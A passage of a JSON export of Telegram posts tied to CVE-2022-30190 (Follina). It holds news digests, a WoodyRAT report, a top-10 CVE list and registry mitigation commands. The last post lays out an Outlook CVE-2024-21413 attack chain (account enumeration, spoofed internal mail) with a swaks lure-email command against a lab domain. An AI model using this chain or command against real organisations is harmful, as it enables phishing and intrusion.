"content": "\u2757\ufe0f\u0412 2022 \u0433. 
\u0442\u0440\u043e\u044f\u043d WoodyRAT \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Microsoft Word \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-30190 \u00abFollina\u00bb, HTM-\u043b\u043e\u0430\u0434\u0435\u0440 \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0434\u043e\u043c\u0435\u043d \u0441 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0435\u0439 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e DNS \u0432 \u0437\u043e\u043d\u0435 .duckdns.org\n\n\ud83d\udccc \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 - \u0432 \u043c\u043e\u0435\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438\n\n\ud83d\udcca Dashboard \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 &amp; \n\ud83d\udcd1 \u041e\u0442\u0447\u0435\u0442\u044b \u043f\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f\u043c\n\n\ud83d\udc26 \u0415\u0436\u0435\u0434\u043d\u0435\u0432\u043d\u044b\u0435 \u043e\u0442\u0447\u0435\u0442\u044b \u0432 Twitter\n\n\ud83d\udd11 #report #woodyrat", "creation_timestamp": "2022-10-13T08:18:14.000000Z"}, {"uuid": "d3aeef07-e509-44bb-ac9a-d814493cdc69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/25", "content": "Top Security News for 02/06/2022\n\nUS Supreme Court puts a hold on enforcement of Texas social media law. INTERPOL issues warning about various forms of online extortion. 
US Commerce Department will restrict cyber exports to China.\nhttps://thecyberwire.com/newsletters/policy-briefing/4/105 \n\nUnofficial patches for the 0-day vulnerability called Follina (CVE-2022-30190)\nhttps://www.reddit.com/r/netsec/comments/v2maa4/unofficial_patches_for_the_0day_vulnerability/ \n\nRansomware attack turns 2022 into 1977 for Somerset County\nhttps://malware.news/t/ransomware-attack-turns-2022-into-1977-for-somerset-county/60662/1 \n\nDiscord Is the Center of the Crypto World and That\u2019s a Problem\nhttps://www.vice.com/en_us/article/4awkew/discord-is-the-center-of-the-crypto-world-and-thats-a-problem \n\nNASA still \u201cpushing\u201d for a Russian cosmonaut to fly on next SpaceX mission\nhttps://arstechnica.com/?p=1856528 \n\nInformation Security BASICS - Anvil Secure\nhttps://www.reddit.com/r/netsec/comments/v2mrkd/information_security_basics_anvil_secure/ \n\nMinerva's evasion based CTF is open for registration\nhttps://www.reddit.com/r/netsec/comments/v2ehz0/minervas_evasion_based_ctf_is_open_for/ \n\nNSIS Installer Malware Included with Various Malicious Files\nhttps://malware.news/t/nsis-installer-malware-included-with-various-malicious-files/60663/1 \n\nMass account takeover in Yunmai smartscale API (full disclosure)\nhttps://www.reddit.com/r/netsec/comments/v0uv1g/mass_account_takeover_in_yunmai_smartscale_api/ \n\nOST2 Vulnerabilities 1001: C-Family Software Implementation Vulnerabilities (Taught via explaining &gt; 3 dozen CVEs from the last 3 years)\nhttps://www.reddit.com/r/netsec/comments/v2ep1m/ost2_vulnerabilities_1001_cfamily_software/ \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-06-02T05:00:06.000000Z"}, {"uuid": "00f76cbf-aa88-4ae6-a8e9-6b362f341fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": 
"exploited", "source": "https://t.me/TopCyberTechNews/24", "content": "Top Security News for 01/06/2022\n\nCode execution 0-day in Windows has been under active exploit for 7 weeks\nhttps://arstechnica.com/?p=1857315 \n\nIs quantum teleportation the future of secure communications?\nhttps://blog.malwarebytes.com/reports/2022/05/is-quantum-teleportation-the-future-of-secure-communications/ \n\nFBI warns of education sector credentials on dark web forums\nhttps://blog.malwarebytes.com/privacy-2/2022/05/fbi-warns-of-education-sector-credentials-on-dark-web-forums/ \n\nRunescape phish claims your email has been changed\nhttps://blog.malwarebytes.com/scams/2022/05/runescape-phish-claims-your-email-has-been-changed/ \n\nMicrosoft Releases Workarounds for Office Vulnerability Under Active Exploitation\nhttps://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html \n\nMarjorie Taylor Greene Says Bill Gates Will Force You to Eat Burgers Made in a \u2018Peach Tree Dish\u2019\nhttps://www.vice.com/en_us/article/5dgne3/marjorie-taylor-greene-says-bill-gates-will-force-you-to-eat-burgers-made-in-a-peach-tree-dish \n\nTechnical Advisory: CVE-2022-30190 Zero-day Vulnerability \u201cFollina\u201d in Microsoft Support Diagnostic Tool\nhttps://malware.news/t/technical-advisory-cve-2022-30190-zero-day-vulnerability-follina-in-microsoft-support-diagnostic-tool/60610/1 \n\nSideWinder Hackers Launched Over a 1,000 Cyber Attacks Over the Past 2 Years\nhttps://thehackernews.com/2022/05/sidewinder-hackers-launched-over-1000.html \n\nInterpol Nabs 3 Nigerian Scammers Behind Malware-based Attacks\nhttps://thehackernews.com/2022/05/interpol-nabs-3-nigerian-scammers.html \n\nThe Internet needs to stop getting excited by vaporware EVs\nhttps://arstechnica.com/?p=1857185 \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-06-01T05:00:04.000000Z"}, {"uuid": 
"1e14f148-7da7-41af-a046-61acd3705058", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/malwar3s/3", "content": "https://github.com/NextSecurity/CVE-2022-30190-follina-Office-MSDT-Fixed", "creation_timestamp": "2023-02-25T05:20:10.000000Z"}, {"uuid": "0093fb79-fd53-4433-895c-f3e051cf5842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/127", "content": "Top Security News for 06/09/2022\n\nRansomware Attackers Abuse Genshin Impact Anti-Cheat System to Disable Antivirus\nhttps://thehackernews.com/2022/09/ransomware-attackers-abuse-genshin.html \n\nSAT/SMT Solvers by Example\nhttps://www.reddit.com/r/netsec/comments/x6y3hk/satsmt_solvers_by_example/ \n\nISC StormCast for Tuesday, September 6th, 2022\nhttps://isc.sans.edu/podcastdetail.html?id=8160 \n\nCVE-2022-30190, AKA Follina, Uses Macro-less Word Docs to Drop RCE Files\nhttps://www.reddit.com/r/netsec/comments/x6aqwc/cve202230190_aka_follina_uses_macroless_word_docs/ \n\nPackMyPayload - Emerging Threat of Containerized Malware. 
It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware.\nhttps://www.reddit.com/r/Malware/comments/x6xpb4/packmypayload_emerging_threat_of_containerized/ \n\nHacking my Helium Crypto Miner\nhttps://www.reddit.com/r/netsec/comments/x6d97k/hacking_my_helium_crypto_miner/ \n\nJPCERT/CC Releases URL Dataset of Confirmed Phishing Sites\nhttps://malware.news/t/jpcert-cc-releases-url-dataset-of-confirmed-phishing-sites/63125/1 \n\nISC Stormcast For Tuesday, September 6th, 2022 https://isc.sans.edu/podcastdetail.html?id=8160, (Tue, Sep 6th)\nhttps://malware.news/t/isc-stormcast-for-tuesday-september-6th-2022-https-isc-sans-edu-podcastdetail-html-id-8160-tue-sep-6th/63123/1 \n\nWalkthrough of an unauthenticated RCE affecting pfBlockerNG &lt;= 2.1.4_26 (CVE-2022-31814)\nhttps://www.reddit.com/r/netsec/comments/x6b5is/walkthrough_of_an_unauthenticated_rce_affecting/ \n\nMicrosoft will disable Basic authentication for Exchange Online in less than a month\nhttps://www.malwarebytes.com/blog/news/2022/09/microsoft-to-disable-basic-auth-for-exchange-online-in-less-than-a-month \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-09-06T14:51:49.000000Z"}, {"uuid": "31200dad-8d16-442b-8013-092ffd1c0d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/monkey_hacker/28", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell (CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. 
ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T07:00:36.000000Z"}, {"uuid": "8965fd15-5fc9-41be-8c34-36fd584e95f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/3-wbVOTdAjOivPyAG2QBt9XaBCAIVLRC_c7I1h87YthbEus", "content": "", "creation_timestamp": "2026-01-08T15:00:07.000000Z"}, {"uuid": "e20dd3a0-50fd-4cfd-b1ce-535e0983d8ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/habr_com_news/6921", "content": "\u200bMicrosoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f Windows 10 \u0438 11 \u043f\u0440\u043e\u0442\u0438\u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 MS Office\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0438\u044e\u043d\u044c\u0441\u043a\u043e\u0433\u043e \u0432\u0442\u043e\u0440\u043d\u0438\u043a\u0430 \u043f\u0430\u0442\u0447\u0435\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f Windows 10 \u0438 11 \u043f\u0440\u043e\u0442\u0438\u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 MS Office 
CVE-2022-30190.\n\nMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043e\u0432\u0435\u0442\u0443\u0435\u0442 \u0432\u0441\u0435\u043c \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0435\u0441\u0442\u044c \u043f\u0430\u0442\u0447 \u043f\u0440\u043e\u0442\u0438\u0432 CVE-2022-30190. \u0418\u044e\u043d\u044c\u0441\u043a\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u043d\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Microsoft Security Response Center (MSRC), \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0435\u0449\u0435 \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0430\u043f\u0440\u0435\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0442\u0447\u0451\u0442\u044b \u043e\u0442 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0442\u043e\u0433\u0434\u0430 \u0432 Microsoft 
\u043e\u0442\u0432\u0435\u0442\u0438\u043b\u0438 \u043e\u0442\u043f\u0438\u0441\u043a\u043e\u0439, \u0447\u0442\u043e \u044d\u0442\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043d\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u0430.\n\n#\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #microsoft #windows", "creation_timestamp": "2022-06-15T17:30:30.000000Z"}, {"uuid": "326f248b-88b3-49c7-aec2-24fb700718cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/poxek/1845", "content": "\u0422\u0443\u0442 \u043f\u0430\u0440\u0443 \u0434\u043d\u0435\u0439 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0433\u0440\u0435\u043c\u0435\u043b  \u043d\u0430 \u0442\u0435\u043c\u0443 0-\u0434\u043d\u044f \u0432 \u043e\u0444\u0438\u0441\u0435 (CVE-2022-30190). \u0412\u0447\u0435\u0440\u0430 \u043c\u0430\u0439\u043a\u0438 \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 Guidance . \u0432 2\u0445 \u0441\u043b\u043e\u0432\u0430\u0445 \u043d\u0430\u0434\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c ms-msdt \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435. 
\ud83e\uddd1\u200d\ud83d\udd27\n\u0434\u0435\u043b\u0430\u0435\u043c \u0431\u044d\u043a\u0430\u043f \u0440\u0435\u0435\u0441\u0442\u0440\u0430\nreg export HKEY_CLASSES_ROOT\\ms-msdt filename\n\u0438 \u0443\u0434\u0430\u043b\u044f\u0435\u043c \u043a\u043b\u044e\u0447 ms-msdt\nreg delete HKEY_CLASSES_ROOT\\ms-msdt /f\n\n\u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u0433\u043e\u0441\u043f\u043e\u0434\u0430 \u0432\u044b\u043a\u0430\u0442\u044f\u0442 \u043f\u0430\u0442\u0447, \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043d\u0430 \u043c\u0435\u0441\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u044b\u043c \u0438\u043c\u043f\u043e\u0440\u0442\u043e\u043c \u0431\u044d\u043a\u0430\u043f\u0430\nreg import filename\n\n\u0422\u0430\u043a\u0436\u0435 \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442\u0441\u044f \u0447\u0442\u043e \u0417\u0430\u0449\u042b\u0442\u043d\u0438\u043a \u0432\u0438\u043d\u0434\u044b \u0440\u0430\u0441\u043f\u043e\u0437\u043d\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u0432\u043a\u0443\u0441\u044c\u043d\u044f\u0445\u0443 \u043a\u0430\u043a \nTrojan:Win32/Mesdetty.A\u202f\nTrojan:Win32/Mesdetty.B\u202f   Behavior:Win32/MesdettyLaunch.A\nBehavior:Win32/MesdettyLaunch.B\nBehavior:Win32/MesdettyLaunch.C\u202f\n\u0412 \u043e\u0431\u0449\u0435\u043c, \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u043a\u043b\u0438\u043a\u0430\u0439\u0442\u0435 \u043f\u043e \u043d\u0435\u0437\u043d\u0430\u043a\u043e\u043c\u044b\u043c \u0444\u0430\u0439\u043b\u0438\u043a\u0430\u043c \u0438 \u0434\u0435\u0440\u0436\u0438\u0442\u0435 \u0432\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043d\u044f \u0432 \u0447\u0438\u0441\u0442\u043e\u0442\u0435.\ud83e\uddfc \n\ud83c\udf0e \u041c\u0438\u0440\u0443 \u2014 \u043c\u0438\u0440!", "creation_timestamp": "2022-06-28T09:49:11.000000Z"}, {"uuid": "14ed86ac-57c4-48ac-8a11-50181d44e66d", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/beaverdreamer/134", "content": "#outlook #cve #social #CVE\n\u041f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043f\u0440\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-21413 \u0432 Outlook (\u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0432 API).\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0448\u0438\u0431\u043a\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URL, \u043a\u043e\u0433\u0434\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c ! \u0432 \u043a\u043e\u043d\u0435\u0446 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u0430 \u0438 \u043e\u0431\u043e\u0439\u0442\u0438 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043f\u0440\u0435\u0449\u0430\u044e\u0442 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u0443\u0449\u043d\u043e\u0441\u0442\u0435\u0439 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u043e \u0441\u0445\u0435\u043c\u0435 file://).\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u0430 \u0434\u043e\u043b\u0436\u043d\u0430 \u043a\u043b\u0438\u043a\u043d\u0443\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u0432 
\u043f\u0438\u0441\u044c\u043c\u0435.\n\n\u0410 \u0442\u0435\u043f\u0435\u0440\u044c \u0431\u0435\u0440\u0435\u043c \u0432\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0442\u0440\u0438 \u0444\u0430\u043a\u0442\u043e\u0440\u0430:\n- \u0412\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0439 \u0441\u0435\u0442\u0438 \u0447\u0430\u0441\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0432\u0441\u0442\u0440\u0435\u0442\u0438\u0442\u044c \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 (\u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0442\u0435\u043c \u0436\u0435 swaks)\n- \u0414\u043e\u0432\u0435\u0440\u0438\u0435 \u043a \u043f\u0438\u0441\u044c\u043c\u0443 \u043e\u0442 \u043a\u043e\u0433\u043e-\u0442\u043e \u0432\u043d\u0443\u0442\u0440\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432\u044b\u0448\u0435, \u0447\u0435\u043c \u0441\u043e \u0432\u043d\u0435\u0448\u043d\u0435\u0439 \u0441\u0442\u043e\u0440\u043e\u043d\u044b (\u0434\u0430 \u0438 \u0421\u0417\u0418 \u0441\u0442\u043e\u044f\u0442 \u043d\u0430 \u043f\u0435\u0440\u0438\u043c\u0435\u0442\u0440\u0435)\n- \u0418\u043c\u044f \u0423\u0417 \u0447\u0430\u0441\u0442\u043e \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0435\u0442 \u0441 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u043c \u0430\u0434\u0440\u0435\u0441\u043e\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\n\n\u0418 \u0441\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u043c \u043f\u0430\u0437\u043b \u0430\u0442\u0430\u043a\u0438 \u0431\u0435\u0437 \u0443\u0447\u0435\u0442\u043a\u0438:\n- \u0421\u043e\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0445 \u0435\u043c\u0435\u0439\u043b\u043e\u0432 
(\u043e\u0442 \u043a\u043e\u0433\u043e \u043f\u043e\u0434\u0434\u0435\u043b\u0430\u0442\u044c \u043f\u0438\u0441\u044c\u043c\u043e \u0438 \u043a\u043e\u043c\u0443 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c)  \u0447\u0435\u0440\u0435\u0437 \u0443\u0442\u0435\u0447\u043a\u0438;\n- \u0427\u0435\u0440\u0435\u0437 \u043a\u0435\u0440\u0431\u0435\u0440\u043e\u0441 \u0432\u044b\u0447\u043b\u0435\u043d\u044f\u0435\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043a\u0438;\n- \u041e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u0438\u043c \u043f\u0438\u0441\u044c\u043c\u043e \u0441 \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u043d\u0430\u0448\u0443 \u0448\u0430\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u0438\u043a;\n- \u0416\u0434\u0435\u043c \u043a\u043b\u0438\u043a\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435.\n\n\u041f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 swaks (HTML \u043f\u0438\u0441\u044c\u043c\u043e + \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u043a\u0430):\nswaks --to beaver02@beaver.lab --from beaver03@beaver.lab --server :25 --header \"Subject: \u041f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0430\u0439\u043b\u0443\" --body '\u0414\u043e\u0431\u0440\u044b\u0439 \u0434\u0435\u043d\u044c, \u0412\u0430\u043c \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0430\u0439\u043b\u0443: \u0417\u0430\u0440\u043f\u043b\u0430\u0442\u043d\u0430\u044f \u0432\u0435\u0434\u043e\u043c\u043e\u0441\u0442\u044c 
\u0437\u0430 2023 \u0433\u043e\u0434' --add-header \"MIME-Version: 1.0\" --add-header \"Content-Type: text/html\" \n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u043c\u0431\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441 0-Click RCE \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0432 Word, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Foolina (CVE-2022-30190), \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0443\u0436\u0435 \u043f\u043e\u0444\u0438\u043a\u0448\u0435\u043d\u043e. \u041c\u0430\u043a\u0440\u043e\u0441\u044b \u043d\u0435 \u043f\u0440\u043e\u0439\u0434\u0443\u0442, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0447\u0435\u0440\u0435\u0437 API, \u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f. 
\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u043e API, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c RCE \u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430\u0445, \u043d\u043e \u043f\u043e\u043a\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u0430\u0443\u0442\u043b\u0443\u043a.\n\n\u0421\u0441\u044b\u043b\u043a\u0438:\n - \u0420\u0430\u0437\u0431\u043e\u0440 \u043e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439: https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/\n - \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0442 MS \u0441 